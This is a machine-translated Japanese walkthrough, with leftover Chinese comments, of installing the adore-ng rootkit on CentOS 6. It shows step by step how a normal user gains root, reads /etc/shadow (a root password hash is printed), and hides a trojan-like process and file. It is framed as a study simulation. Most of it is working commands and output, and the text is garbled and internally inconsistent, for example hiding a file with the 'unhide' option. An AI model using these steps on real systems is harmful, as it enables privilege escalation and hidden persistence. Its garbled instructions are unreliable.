ルートキットは、その機能がインストール対象に自分自身と指定されたファイル、プロセス、およびWebリンクやその他の情報を隠すことである、悪意のあるソフトウェアの特別な種類で、より一般的に見ルートキットやトロイの木馬、バックドアと連動して他の悪意のあるプログラムです。
そして、私たちが勉強したい、今日は、マルウェアルートキット1のようにそれをシミュレートすることです:崇拝-ngの
環境:CentOSに6
2つのリソースは、ここでは必要性(ダウンロード)を使用しました。
インストールの崇拝-ngが
カーネル-develの-2.6:依存をマウント
[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm
Loaded plugins: fastestmirror, security
Setting up Install Process
……
Installed:
kernel-devel.x86_64 0:2.6.32-754.27.1.el6
Complete!
解凍インストーラ崇拝-NG
[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root 1143 Dec 30 2015 Makefile
# 已经有 makefile 文件,直接 make -j 4 编译即可
[root@Fp-01 adore-ng-master]# make -j 4
ロード・モジュール
[root@Fp-01 adore-ng-master]# insmod adore-ng.ko
ビューヘルプ
[root@Fp-01 adore-ng-master]# ./ava
I print info (secret UID etc)
h hide file # 隐藏文件
u unhide file # 取消隐藏文件
r execute as root # 以root用户执行
R remove PID forever # 永久删除PID
U uninstall adore # 卸载 adore
i make PID invisible # 隐藏PID
v make PID visible # 取消隐藏PID
ルート言及する一般ユーザー権利
の共通の意志の使用をテストするためにユーザーを追加します
[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.
スイッチは、rootユーザーのホームディレクトリを入力することはできませんので、次は/ tmpに崇拝-ngのをコピーし、CP -r:再帰的なコピー
[root@Fp-01 ~]# cp -r adore-ng-master /tmp/
スイッチのユーザーは、トム・ユーザ・ログイン・サーバを使用します
[root@Fp-01 ~]# ssh [email protected]
Are you sure you want to continue connecting (yes/no)? yes
tom@10.0.0.11's password:
[tom@Fp-01 ~]$ whoami
tom
テストは、/ etc /影
[tom@Fp-01 ~]$ vim /etc/shadow ……
"/etc/shadow" [Permission Denied]
あなたは、許可が拒否され、この時間を見ることができ、我々はAVAを使用する権利を言及する必要があります
[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
……
別の端末のプロセス上の表示には、ユーザーIDがルート、明示的に言及した成功を言う権利であります
[root@Fp-01 ~]# ps -ef |grep /etc/shadow
root 32703 30867 0 12:03 pts/3 00:00:00 vim /etc/shadow
root 32727 32667 0 12:03 pts/4 00:00:00 grep /etc/shadow
隠されたトロイの木馬のプロセスの
シミュレーション編集トロイの木馬プログラム
[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.
#!/bin/bash
while :
do
echo `This is the virus` >> date.txt
sleep 1
done
トロイの木馬シンプルなアナログ出力は、バックグラウンドで実行されている、「これはビリオンである」、プラス実行権限
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.
プロセスIDによりプロセスを表示するために行きます
[tom@Fp-01 script]$ ps -ef |grep 33987
root 33987 30867 0 12:14 pts/3 00:00:00 /bin/bash ./a.sh
root 34137 33987 0 12:14 pts/3 00:00:00 sleep 1
tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
あなたは隠されたプロセスシミュレーション、そして、ハッカーを表示することができます
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.
成功を隠し、この時間は、私たちが発見の過程を見に行く、プロセスが隠されています
[tom@Fp-01 script]$ ps -ef |grep 33987
tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
大きな動き:隠しファイル
の最初のファイル情報の下の/ optディレクトリを参照するには
[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
├── a.sh
└── date.txt
私たちは非表示date.txtをシミュレート
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.
表示するには、この時間は、あなたは、ファイルが発見された見つけることができません
[root@Fp-01 script]# tree /opt/
/opt/
└── script
└── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
root権限に権限昇格- >隠す親- >親プロセスが子プロセス(ビリオン)を開始- >隠すフォルダは
、このようなトロイの木馬が完了すると、システム管理者は、見つけることは困難です